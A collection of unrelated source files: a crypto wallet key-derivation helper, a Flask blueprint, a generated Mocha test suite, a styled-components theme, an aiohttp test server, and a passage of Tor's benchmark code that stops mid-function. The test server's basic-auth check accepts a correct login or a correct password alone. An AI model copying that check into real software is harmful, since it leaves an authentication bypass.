#!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
from .utils import (
Wallet, HDPrivateKey, HDKey
)
from .network import *
import inspect
def generate_mnemonic(strength=128):
_, seed = HDPrivateKey.master_key_from_entropy(strength=strength)
return seed
def generate_child_id():
now = datetime.now()
seconds_since_midnight = (now - now.replace(
hour=0, minute=0, second=0, microsecond=0)).total_seconds()
return int((int(now.strftime(
'%y%m%d')) + seconds_since_midnight*1000000) // 100)
def create_address(network='btctest', xpub=None, child=None, path=0):
assert xpub is not None
if child is None:
child = generate_child_id()
if network == 'ethereum' or network.upper() == 'ETH':
acct_pub_key = HDKey.from_b58check(xpub)
keys = HDKey.from_path(
acct_pub_key, '{change}/{index}'.format(change=path, index=child))
res = {
"path": "m/" + str(acct_pub_key.index) + "/" + str(keys[-1].index),
"bip32_path": "m/44'/60'/0'/" + str(acct_pub_key.index) + "/" + str(keys[-1].index),
"address": keys[-1].address()
}
if inspect.stack()[1][3] == "create_wallet":
res["xpublic_key"] = keys[-1].to_b58check()
return res
# else ...
wallet_obj = Wallet.deserialize(xpub, network=network.upper())
child_wallet = wallet_obj.get_child(child, is_prime=False)
net = get_network(network)
return {
"path": "m/" + str(wallet_obj.child_number) + "/" +str(child_wallet.child_number),
"bip32_path": net.BIP32_PATH + str(wallet_obj.child_number) + "/" +str(child_wallet.child_number),
"address": child_wallet.to_address(),
# "xpublic_key": child_wallet.serialize_b58(private=False),
# "wif": child_wallet.export_to_wif() # needs private key
}
def get_network(network='btctest'):
network = network.lower()
if network == "bitcoin_testnet" or network == "btctest":
return BitcoinTestNet
elif network == "bitcoin" or network == "btc":
return BitcoinMainNet
elif network == "dogecoin" or network == "doge":
return DogecoinMainNet
elif network == "dogecoin_testnet" or network == "dogetest":
return DogecoinTestNet
elif network == "litecoin" or network == "ltc":
return LitecoinMainNet
elif network == "litecoin_testnet" or network == "ltctest":
return LitecoinTestNet
elif network == "bitcoin_cash" or network == "bch":
return BitcoinCashMainNet
elif network == "bitcoin_gold" or network == "btg":
return BitcoinGoldMainNet
elif network == "dash":
return DashMainNet
elif network == "dash_testnet" or network == 'dashtest':
return DashTestNet
elif network == 'omni':
return OmniMainNet
elif network == 'omni_testnet':
return OmniTestNet
elif network == "feathercoin" or network == 'ftc':
return FeathercoinMainNet
elif network == "qtum":
return QtumMainNet
elif network == "qtum_testnet" or network == "qtumtest":
return QtumTestNet
return BitcoinTestNet
def create_wallet(network='btctest', seed=None, children=1):
if seed is None:
seed = generate_mnemonic()
net = get_network(network)
wallet = {
"coin": net.COIN,
"seed": seed,
"private_key": "",
"public_key": "",
"xprivate_key": "",
"xpublic_key": "",
"address": "",
"wif": "",
"children": []
}
if network == 'ethereum' or network.upper() == 'ETH':
wallet["coin"] = "ETH"
master_key = HDPrivateKey.master_key_from_mnemonic(seed)
root_keys = HDKey.from_path(master_key, "m/44'/60'/0'")
acct_priv_key = root_keys[-1]
acct_pub_key = acct_priv_key.public_key
wallet["private_key"] = acct_priv_key.to_hex()
wallet["public_key"] = acct_pub_key.to_hex()
wallet["xprivate_key"] = acct_priv_key.to_b58check()
wallet["xpublic_key"] = acct_pub_key.to_b58check()
child_wallet = create_address(
network=network.upper(), xpub=wallet["xpublic_key"],
child=0, path=0)
wallet["address"] = child_wallet["address"]
wallet["xpublic_key_prime"] = child_wallet["xpublic_key"]
# get public info from first prime child
for child in range(children):
child_wallet = create_address(
network=network.upper(), xpub=wallet["xpublic_key"],
child=child, path=0
)
wallet["children"].append({
"address": child_wallet["address"],
"xpublic_key": child_wallet["xpublic_key"],
"path": "m/" + str(child),
"bip32_path": "m/44'/60'/0'/" + str(child),
})
else:
my_wallet = Wallet.from_master_secret(
network=network.upper(), seed=seed)
# account level
wallet["private_key"] = my_wallet.private_key.get_key().decode()
wallet["public_key"] = my_wallet.public_key.get_key().decode()
wallet["xprivate_key"] = my_wallet.serialize_b58(private=True)
wallet["xpublic_key"] = my_wallet.serialize_b58(private=False)
wallet["address"] = my_wallet.to_address()
wallet["wif"] = my_wallet.export_to_wif().decode()
prime_child_wallet = my_wallet.get_child(0, is_prime=True)
wallet["xpublic_key_prime"] = prime_child_wallet.serialize_b58(private=False)
# prime children
for child in range(children):
child_wallet = my_wallet.get_child(child, is_prime=False, as_private=False)
wallet["children"].append({
"xpublic_key": child_wallet.serialize_b58(private=False),
"address": child_wallet.to_address(),
"path": "m/" + str(child),
"bip32_path": net.BIP32_PATH + str(child_wallet.child_number),
})
return wallet
|
"""Controller for the api/ endpoint, test with api/getstuff"""
from flask import Blueprint
mod = Blueprint('api', __name__)
@mod.route('/getstuff')
def getstuff():
return '{"result" : "You are accessing the api"}'
@mod.route('/device/<int:device_id>/data')
@mod.route('/registry/<int:reg_id>/data/<int:device_id>')
def getjsondata(device_id=False, reg_id=False):
print "got json request!"
if device_id == False:
jsonfied = listmenujson(reg_id)
return jsonfied
else:
jsonfied = getitemjson(reg_id, device_id)
return jsonfied
|
/* eslint no-underscore-dangle: ["error", { "allow": ["__get__"] }] */
'use strict';
const Mocha = require('mocha');
const Chai = require('chai');
const jsdocx = require('jsdoc-x');
const http = require('http');
const rewire = require('rewire');
const qs = require('querystring');
const EventEmitter = require('events');
const moment = require('moment');
const { Test, Suite } = Mocha;
const { expect } = Chai;
const serverEmitter = new EventEmitter();
const serverPort = 3334;
const serverAddress = '127.0.0.1';
const serverHost = `http://${serverAddress}`;
const serverValidKey = 'validKey';
let server;
const OpenWeatherMap = require('../../index');
function generateArgsFromParams(params) {
const parameters = ((Array.isArray(params)) ? params : [])
.slice(0)
.map((param) => {
return param.type;
})
.map((param) => {
if (param.includes('Array.<')) {
switch (param.substr(7, (param.length - 8))) {
case 'String':
return ['test1', 'test2', 'test3'];
case 'Number':
return [5, 7, 9];
case 'Object':
return [{ test: true }, { test: false }];
default:
return [];
}
} else {
switch (param) {
case 'options={}':
return {};
case 'String':
return 'test1';
case 'Number':
return 5;
case 'Object':
return { test: true };
case 'CityIDReqParams':
return { id: 'London' };
case 'Coordinate':
return { latitude: 51.509865, longitude: -0.118092 };
case 'PollutionParams':
return {
coordinates: { latitude: 51.509865, longitude: -0.118092 },
datetime: moment()
};
default:
return null;
}
}
});
return parameters;
}
/**
* @method getFunctionArgumentNames
* @description parses a function to determine its arguments and returns them as a string
* @param {Function} func the function to parse
* @returns {String[]} an array of argument names for the suppl;ied function
*/
function getFunctionArgumentNames(func) {
const argMatches = func.toString().match(/\(([^)]*)\)/);
const argString = (argMatches && Array.isArray(argMatches) && argMatches.length >= 2)
? argMatches[1]
: '';
return argString.split(',').map((arg) => { return arg.trim().replace('={}', ''); });
}
/**
* @method getAPITests
* @description gets all of the js files within the lib directory and parses there jsdoc tags in
* order to proceedurly generate tests based on the jsdocs. This requires certain tags to be
* present such as the type (used to determine what type of request) aswell as the item under test
* needing to be an inner method of a class.
* @summary parse api jsdocs to generate test list
* @returns {Promise} resolves with an object containing the jsdoc info or rejects with an error
*/
function getAPITests() {
return jsdocx.parse('./lib/*.js')
.then((docs) => {
const innerMethods = docs
.filter((doc) => { // only get methods
return doc.scope === 'inner' && doc.access && doc.access === 'public';
})
.map((doc) => { // map the docs to remove useless data
return {
params: (doc.params)
? doc.params
.map((param) => {
return {
type: param.type.names[0],
name: param.name.replace('={}', ''),
optional: (param.optional && param.optional === true)
};
})
.filter((param) => {
return !param.name.includes('.');
})
: [],
memberof: doc.memberof,
description: doc.description,
see: doc.see,
name: doc.name
};
})
.reduce((methods, doc) => { // sort all the functions into categories (mixins)
if (!methods[doc.memberof]) {
methods[doc.memberof] = [];
}
methods[doc.memberof].push(doc);
return methods;
}, {});
return innerMethods;
});
}
const apiSuite = new Suite('civocloud-nodejs api tests');
module.exports = () => {
return getAPITests()
.then((methods) => {
apiSuite.beforeAll('Test Endpoint setup', (done) => {
server = http.createServer((req, res) => {
let data = '';
req.on('data', (chunk) => { data += chunk; });
req.on('end', () => {
serverEmitter.emit('receivedRequest', {
req,
body: qs.parse(data) || {},
params: (req.url.includes('?'))
? qs.parse(req.url.split('?')[1]) || {}
: {}
});
res.writeHead(200);
res.write('{}');
res.end();
});
});
server.on('listening', () => {
done();
});
server.listen(serverPort, serverAddress);
});
apiSuite.afterAll('Test Endpoint destroy', (done) => {
server.close((err) => {
done(err);
});
});
const innerMethods = methods;
const outerMethods = Object.keys(methods);
for (let o = 0, oLength = outerMethods.length; o < oLength; o += 1) {
const testSuite = new Suite(`${outerMethods[o]}`);
for (let i = 0, iLength = innerMethods[outerMethods[o]].length; i < iLength; i += 1) {
const method = innerMethods[outerMethods[o]][i];
const methodSuite = new Suite(`${method.name}()`);
methodSuite.timeout(5000);
methodSuite.addTest(new Test('Function exposed', () => {
const owm = new OpenWeatherMap.OpenWeatherMap({ apiKey: 'test' });
expect(owm[method.name]).to.be.a('function', 'method is not exposed as a function');
}));
methodSuite.addTest(new Test('Function has description', () => {
expect(method.description).to.not.be.equal(undefined);
expect(method.description).to.not.be.equal(null);
expect(method.description).to.not.be.equal('');
}));
methodSuite.addTest(new Test('Function has see link to openweathermap.org', () => {
expect(method.see).to.not.be.equal(undefined);
expect(method.see).to.be.an('array');
expect(method.see).to.have.lengthOf(1);
expect(method.see).to.include.to.match(/{@link https:\/\/openweathermap\.org.+/);
}));
if (/\[GET|POST|PUT|HEAD|DELETE|OPTIONS\]/.test(method.description)) {
// request stuff here
methodSuite.addTest(new Test('Function calls API endpoint', (done) => {
const methodType = method.description
.match(/\[(GET|POST|PUT|HEAD|DELETE|OPTIONS)\]/)[1];
const MUTT = new OpenWeatherMap.OpenWeatherMap({
apiKey: serverValidKey,
host: serverAddress,
port: serverPort
});
serverEmitter.once('receivedRequest', (payload) => {
expect(payload.req.headers).to.deep.include({ accept: 'application/json' });
expect(payload.params).to.include.keys(['APPID']);
expect(payload.req.method).to.be.equal(methodType);
done();
});
MUTT[method.name](...generateArgsFromParams(method.params))
.catch((err) => {
done(err);
});
}));
}
methodSuite.addTest(new Test('Correct Parameters', () => {
const owm = new OpenWeatherMap.OpenWeatherMap({ apiKey: 'test' });
const nonOptionalParams = method.params
.filter((param) => {
return ((!param.optional || (param.optional && param.optional === false))
&& param.name !== '');
})
.map((param) => {
return param.name;
});
const hasOptionals = method.params
.map((param) => {
return param.optional || false;
})
.reduce((hasOptional, arg) => {
return (hasOptional || arg);
}, false);
if (hasOptionals === true) {
nonOptionalParams.push('options');
}
if (nonOptionalParams.length === 0) {
nonOptionalParams.push('');
}
expect(getFunctionArgumentNames(owm[method.name])).to.have.members(nonOptionalParams);
expect(owm[method.name]).to.be.an('function');
}));
testSuite.addSuite(methodSuite);
}
apiSuite.addSuite(testSuite);
}
const sendRequestSuite = new Suite('sendRequest functional tests');
sendRequestSuite.addTest(new Test('sendRequest exists', () => {
const owm = new OpenWeatherMap.OpenWeatherMap({ apiToken: 'test' });
expect(owm.sendRequest).to.not.be.equal(undefined);
expect(owm.sendRequest).to.be.an('function');
}));
apiSuite.addSuite(sendRequestSuite);
const parsePartialDateTimeSuite = new Suite('parsePartialDateTime functional tests');
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime exists', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
expect(parsePartialDateTime).to.not.be.equal(undefined);
expect(parsePartialDateTime).to.be.an('function');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime no datetime data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({});
expect(result).to.not.be.equal(undefined);
expect(result).to.be.equal(null);
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime only year data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({ year: 2017 });
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({ year: 2017, month: 12 });
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month-day data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({ year: 2017, month: 12, day: 24 });
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month-dayThour data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
month: 12,
day: 24,
hour: 16
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month-dayThour:minute data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
month: 12,
day: 24,
hour: 16,
minute: 38
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:38Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime year-month-dayThour:minute:second data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
month: 12,
day: 24,
hour: 16,
minute: 38,
second: 32
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:38:32Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime all terms missing month data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
day: 24,
hour: 16,
minute: 38,
second: 32
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017Z');
done();
}));
parsePartialDateTimeSuite.addTest(new Test('parsePartialDateTime all terms missing minute data', (done) => {
const airPollution = rewire('../../lib/airPollution');
const parsePartialDateTime = airPollution.__get__('parsePartialDateTime');
const result = parsePartialDateTime({
year: 2017,
month: 12,
day: 24,
hour: 16,
second: 32
});
expect(result).to.not.be.equal(undefined);
expect(result).to.not.be.equal(null);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16Z');
done();
}));
apiSuite.addSuite(parsePartialDateTimeSuite);
const formatDateTimeSuite = new Suite('formatDateTime functional tests');
formatDateTimeSuite.addTest(new Test('formatDateTime exists', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
expect(formatDateTime).to.not.be.equal(undefined);
expect(formatDateTime).to.be.an('function');
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime returns null', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime({});
expect(result).to.not.be.equal(undefined);
expect(result).to.be.equal(null);
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime using moment', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime(moment('2017-12-24T16:47:03Z'));
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:47:03.000Z');
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime using native Date', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime(new Date(1514134023000)); // is '2017-12-24T16:47:03.000Z'
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:47:03.000Z');
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime using partial date object', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime({ year: 2017, month: 12, day: 24 });
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24Z');
done();
}));
formatDateTimeSuite.addTest(new Test('formatDateTime using manual string', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatDateTime = airPollution.__get__('formatDateTime');
const result = formatDateTime('2017-12-24T16:47:03.000Z');
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('2017-12-24T16:47:03.000Z');
done();
}));
apiSuite.addSuite(formatDateTimeSuite);
const formatCoordinatesSuite = new Suite('formatCoordinates functional tests');
formatCoordinatesSuite.addTest(new Test('formatCoordinates exists', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatCoordinates = airPollution.__get__('formatCoordinates');
expect(formatCoordinates).to.not.be.equal(undefined);
expect(formatCoordinates).to.be.an('function');
done();
}));
formatCoordinatesSuite.addTest(new Test('formatCoordinates returns null on empty input', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatCoordinates = airPollution.__get__('formatCoordinates');
const result = formatCoordinates();
expect(result).to.not.be.equal(undefined);
expect(result).to.be.equal(null);
done();
}));
formatCoordinatesSuite.addTest(new Test('formatCoordinates returns null on empty object', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatCoordinates = airPollution.__get__('formatCoordinates');
const result = formatCoordinates({});
expect(result).to.not.be.equal(undefined);
expect(result).to.be.equal(null);
done();
}));
formatCoordinatesSuite.addTest(new Test('formatCoordinates returns string with coordinates', (done) => {
const airPollution = rewire('../../lib/airPollution');
const formatCoordinates = airPollution.__get__('formatCoordinates');
const result = formatCoordinates({ latitude: 12.3456, longitude: 7.89 });
expect(result).to.not.be.equal(undefined);
expect(result).to.be.an('string');
expect(result).to.be.equal('12.3456,7.89');
done();
}));
apiSuite.addSuite(formatCoordinatesSuite);
return apiSuite;
});
};
|
import { createGlobalStyle } from 'styled-components'
const GlobalStyle = createGlobalStyle`
* {
box-sizing: border-box;
padding: 0;
margin: 0;
outline: 0;
}
body, html {
@import url('https://fonts.googleapis.com/css?family=Roboto');
background: #eee;
font-family: Roboto, sans-serif;
height: 100%;
width: 100%;
}
`
const GlobalTheme = {
primary: '#ff0198',
secondary: '#01c1d6',
//danger: '#eb238e',
danger: 'green',
light: '#f4f4f4',
dark: '#222'
};
export {
GlobalStyle,
GlobalTheme
}
|
# Using aiohttp server part since it already comes as part of aiohttp
import asyncio
import socket
import ssl
import subprocess
from dataclasses import dataclass, field
from http import HTTPStatus
from pathlib import Path
from tempfile import NamedTemporaryFile
from typing import Optional
import structlog
from aiohttp import BasicAuth, web
from .models import Pet, Pets
routes = web.RouteTableDef()
logger = structlog.get_logger(__name__)
@routes.get("/api/v1/str")
async def get_str(request: web.Request):
return web.Response(text="boo")
@routes.get("/api/v1/bearer_protected_str")
async def get_bearer_protected_str(request: web.Request):
logger.info(auth=request.headers.get("Authorization"))
if request.headers.get("authorization", "") != "Bearer let-the-bear-in":
raise web.HTTPForbidden()
return web.Response(text="you have made it through")
@routes.get("/api/v1/basic_protected_str")
async def get_basic_protected_str(request: web.Request):
logger.info(auth=request.headers.get("Authorization"))
auth_info = request.headers.get("authorization", "")
if not auth_info:
raise web.HTTPForbidden()
try:
auth = BasicAuth.decode(auth_info)
except ValueError:
logger.exception(f"Failed to decode auth data {auth_info}")
raise web.HTTPBadRequest()
if auth.login != "emu" and auth.password != "wars":
raise web.HTTPForbidden()
return web.Response(text="you have made it through")
@routes.get("/api/v1/bytes")
async def get_bytes(request: web.Request):
return web.Response(body=b"bin-boo")
@routes.get("/api/v1/int")
async def get_int(request: web.Request):
return web.Response(text="1")
@routes.get("/api/v1/json_int")
async def get_json_int(request: web.Request):
return web.json_response(1)
@routes.get("/api/v1/json_str")
async def get_json_str(request: web.Request):
return web.json_response("boo")
@routes.delete("/api/v1/pets/1")
async def delete_pet(request: web.Request):
return web.Response(status=HTTPStatus.NO_CONTENT)
@routes.get("/api/v1/pets/1")
async def get_pet(request: web.Request):
return web.json_response(Pet(name="foo").dict())
@routes.put("/api/v1/pets/1")
async def put_pet(request: web.Request):
pet_info = await request.json()
return web.json_response(Pet(name=pet_info["name"]).dict())
@routes.get("/api/v1/pets")
async def get_pets(request: web.Request):
pets = Pets(__root__=[Pet(name="foo"), Pet(name="bar")])
return web.json_response(pets.dict()["__root__"])
@routes.post("/api/v1/pets")
async def post_pets(request: web.Request):
pet_info = await request.json()
return web.json_response(Pet(name=pet_info["name"]).dict())
@routes.post("/api/v1/pets/_from_form")
async def post_pets_form(request: web.Request):
pet_form = await request.post()
return web.json_response(Pet(name=pet_form["name"]).dict())
@routes.get("/api/v1/pets/2")
async def get_missing_pet(request: web.Request):
raise web.HTTPNotFound(body="No such pet")
@routes.get("/api/v1/pets/slow")
async def get_slow_pet(request: web.Request):
# At least 1 second since client measures timeouts in multiples of 1 second
# https://github.com/aio-libs/aiohttp/issues/4850
await asyncio.sleep(1.1)
return web.json_response(Pet(name="slow").dict())
@routes.post("/api/v1/pets/slow")
async def post_slow_pet(request: web.Request):
# At least 1 second since client measures timeouts in multiples of 1 second
# https://github.com/aio-libs/aiohttp/issues/4850
await asyncio.sleep(1.1)
return web.json_response(Pet(name="slow").dict())
@routes.put("/api/v1/pets/slow")
async def put_slow_pet(request: web.Request):
# At least 1 second since client measures timeouts in multiples of 1 second
# https://github.com/aio-libs/aiohttp/issues/4850
await asyncio.sleep(1.1)
return web.json_response(Pet(name="slow").dict())
@routes.delete("/api/v1/pets/slow")
async def delete_slow_pet(request: web.Request):
# At least 1 second since client measures timeouts in multiples of 1 second
# https://github.com/aio-libs/aiohttp/issues/4850
await asyncio.sleep(1.1)
return web.json_response(Pet(name="slow").dict())
@routes.post("/api/v1/pets/1/photo")
async def set_pet_photo(request: web.Request):
data = await request.post()
return web.Response(text=data["photo"].file.read().decode())
@dataclass
class Server:
port: int = field(init=False)
sock: socket.socket = field(init=False)
site: web.SockSite = field(init=False, repr=False)
def __post_init__(self) -> None:
self.sock = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
self.sock.bind(("localhost", 0))
_, self.port = self.sock.getsockname()
async def start(self, ssl_context: Optional[ssl.SSLContext] = None) -> None:
app = web.Application()
app.add_routes(routes)
runner = web.AppRunner(app)
await runner.setup()
self.site = web.SockSite(runner=runner, sock=self.sock, ssl_context=ssl_context)
await self.site.start()
logger.info("Server is up", port=self.port)
async def stop(self) -> None:
await self.site.stop()
logger.info("Server stopped")
self.sock.close()
@dataclass
class SSLServer(Server):
cert_file: NamedTemporaryFile = field(init=False, repr=False)
def __post_init__(self) -> None:
super().__post_init__()
self.cert_file = NamedTemporaryFile()
self._gen_cert(self.cert_file.name)
def _gen_cert(self, path: Path) -> None:
subprocess.run(
f"openssl req -new -x509 -days 365 -nodes -out {path} -keyout {path}"
+ " -subj '/C=AU/ST=VIC/O=ACME/CN=example.com'",
shell=True,
check=True,
capture_output=True,
)
logger.info("Generated x509 key/cert", path=path)
async def start(self) -> None:
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ssl_context.load_cert_chain(self.cert_file.name)
return await super().start(ssl_context)
async def stop(self) -> None:
self.cert_file.close()
await super().stop()
|
/* Copyright (c) 2001-2004, Roger Dingledine.
* Copyright (c) 2004-2006, Roger Dingledine, Nick Mathewson.
* Copyright (c) 2007-2019, The Tor Project, Inc. */
/* See LICENSE for licensing information */
/**
* \file bench.c
* \brief Benchmarks for lower level Tor modules.
**/
#include "orconfig.h"
#include "core/or/or.h"
#include "core/crypto/onion_tap.h"
#include "core/crypto/relay_crypto.h"
#include "lib/intmath/weakrng.h"
#ifdef ENABLE_OPENSSL
#include <openssl/opensslv.h>
#include <openssl/evp.h>
#include <openssl/ec.h>
#include <openssl/ecdh.h>
#include <openssl/obj_mac.h>
#endif
#include "core/or/circuitlist.h"
#include "app/config/config.h"
#include "app/main/subsysmgr.h"
#include "lib/crypt_ops/crypto_curve25519.h"
#include "lib/crypt_ops/crypto_dh.h"
#include "core/crypto/onion_ntor.h"
#include "lib/crypt_ops/crypto_ed25519.h"
#include "lib/crypt_ops/crypto_rand.h"
#include "feature/dircommon/consdiff.h"
#include "lib/compress/compress.h"
#include "core/or/cell_st.h"
#include "core/or/or_circuit_st.h"
#include "lib/crypt_ops/digestset.h"
#include "lib/crypt_ops/crypto_init.h"
#include "feature/dirparse/microdesc_parse.h"
#include "feature/nodelist/microdesc.h"
#if defined(HAVE_CLOCK_GETTIME) && defined(CLOCK_PROCESS_CPUTIME_ID)
static uint64_t nanostart;
static inline uint64_t
timespec_to_nsec(const struct timespec *ts)
{
return ((uint64_t)ts->tv_sec)*1000000000 + ts->tv_nsec;
}
static void
reset_perftime(void)
{
struct timespec ts;
int r;
r = clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &ts);
tor_assert(r == 0);
nanostart = timespec_to_nsec(&ts);
}
static uint64_t
perftime(void)
{
struct timespec ts;
int r;
r = clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &ts);
tor_assert(r == 0);
return timespec_to_nsec(&ts) - nanostart;
}
#else /* !(defined(HAVE_CLOCK_GETTIME) && defined(CLOCK_PROCESS_CPUTIME_ID)) */
static struct timeval tv_start = { 0, 0 };
static void
reset_perftime(void)
{
tor_gettimeofday(&tv_start);
}
static uint64_t
perftime(void)
{
struct timeval now, out;
tor_gettimeofday(&now);
timersub(&now, &tv_start, &out);
return ((uint64_t)out.tv_sec)*1000000000 + out.tv_usec*1000;
}
#endif /* defined(HAVE_CLOCK_GETTIME) && defined(CLOCK_PROCESS_CPUTIME_ID) */
#define NANOCOUNT(start,end,iters) \
( ((double)((end)-(start))) / (iters) )
#define MICROCOUNT(start,end,iters) \
( NANOCOUNT((start), (end), (iters)) / 1000.0 )
/** Run AES performance benchmarks. */
static void
bench_aes(void)
{
int len, i;
char *b1, *b2;
crypto_cipher_t *c;
uint64_t start, end;
const int bytes_per_iter = (1<<24);
reset_perftime();
char key[CIPHER_KEY_LEN];
crypto_rand(key, sizeof(key));
c = crypto_cipher_new(key);
for (len = 1; len <= 8192; len *= 2) {
int iters = bytes_per_iter / len;
b1 = tor_malloc_zero(len);
b2 = tor_malloc_zero(len);
start = perftime();
for (i = 0; i < iters; ++i) {
crypto_cipher_encrypt(c, b1, b2, len);
}
end = perftime();
tor_free(b1);
tor_free(b2);
printf("%d bytes: %.2f nsec per byte\n", len,
NANOCOUNT(start, end, iters*len));
}
crypto_cipher_free(c);
}
static void
bench_onion_TAP(void)
{
const int iters = 1<<9;
int i;
crypto_pk_t *key, *key2;
uint64_t start, end;
char os[TAP_ONIONSKIN_CHALLENGE_LEN];
char or[TAP_ONIONSKIN_REPLY_LEN];
crypto_dh_t *dh_out = NULL;
key = crypto_pk_new();
key2 = crypto_pk_new();
if (crypto_pk_generate_key_with_bits(key, 1024) < 0)
goto done;
if (crypto_pk_generate_key_with_bits(key2, 1024) < 0)
goto done;
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
onion_skin_TAP_create(key, &dh_out, os);
crypto_dh_free(dh_out);
}
end = perftime();
printf("Client-side, part 1: %f usec.\n", NANOCOUNT(start, end, iters)/1e3);
onion_skin_TAP_create(key, &dh_out, os);
start = perftime();
for (i = 0; i < iters; ++i) {
char key_out[CPATH_KEY_MATERIAL_LEN];
onion_skin_TAP_server_handshake(os, key, NULL, or,
key_out, sizeof(key_out));
}
end = perftime();
printf("Server-side, key guessed right: %f usec\n",
NANOCOUNT(start, end, iters)/1e3);
start = perftime();
for (i = 0; i < iters; ++i) {
char key_out[CPATH_KEY_MATERIAL_LEN];
onion_skin_TAP_server_handshake(os, key2, key, or,
key_out, sizeof(key_out));
}
end = perftime();
printf("Server-side, key guessed wrong: %f usec.\n",
NANOCOUNT(start, end, iters)/1e3);
start = perftime();
for (i = 0; i < iters; ++i) {
crypto_dh_t *dh;
char key_out[CPATH_KEY_MATERIAL_LEN];
int s;
dh = crypto_dh_dup(dh_out);
s = onion_skin_TAP_client_handshake(dh, or, key_out, sizeof(key_out),
NULL);
crypto_dh_free(dh);
tor_assert(s == 0);
}
end = perftime();
printf("Client-side, part 2: %f usec.\n",
NANOCOUNT(start, end, iters)/1e3);
done:
crypto_dh_free(dh_out);
crypto_pk_free(key);
crypto_pk_free(key2);
}
static void
bench_onion_ntor_impl(void)
{
const int iters = 1<<10;
int i;
curve25519_keypair_t keypair1, keypair2;
uint64_t start, end;
uint8_t os[NTOR_ONIONSKIN_LEN];
uint8_t or[NTOR_REPLY_LEN];
ntor_handshake_state_t *state = NULL;
uint8_t nodeid[DIGEST_LEN];
di_digest256_map_t *keymap = NULL;
curve25519_secret_key_generate(&keypair1.seckey, 0);
curve25519_public_key_generate(&keypair1.pubkey, &keypair1.seckey);
curve25519_secret_key_generate(&keypair2.seckey, 0);
curve25519_public_key_generate(&keypair2.pubkey, &keypair2.seckey);
dimap_add_entry(&keymap, keypair1.pubkey.public_key, &keypair1);
dimap_add_entry(&keymap, keypair2.pubkey.public_key, &keypair2);
